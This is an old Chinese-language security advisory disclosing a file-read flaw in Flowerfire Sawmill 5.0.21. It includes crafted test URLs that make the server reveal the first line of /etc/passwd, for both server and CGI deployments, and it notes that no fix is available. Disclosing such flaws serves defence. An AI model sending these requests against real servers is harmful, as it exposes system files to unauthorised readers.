Flowerfire Sawmill文件访问漏洞发布时间:2000-05-12 更新时间:2000-05-12 严重程度:中 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Flowerfire Sawmill 5.0.21详细描述 Sawmill是一个站点统计的软件包,windows\unix\mac都可以使用,通过特殊的请求方式可以 看到任何文件的第一行文字,比如/etc/passwd,其输出看起来如下: "Unknown configuration command "root:x:0:0:root:/root:/bin/sh" in "/etc/passwd"." 测试代码 下面的请求会显示/etc/passwd的第一行文字 http://target:port/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3 如果它是以cgi运行的,那么你可以用下面的方式来获取信息 http://target/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1 解决方案 尚无 相关信息 |
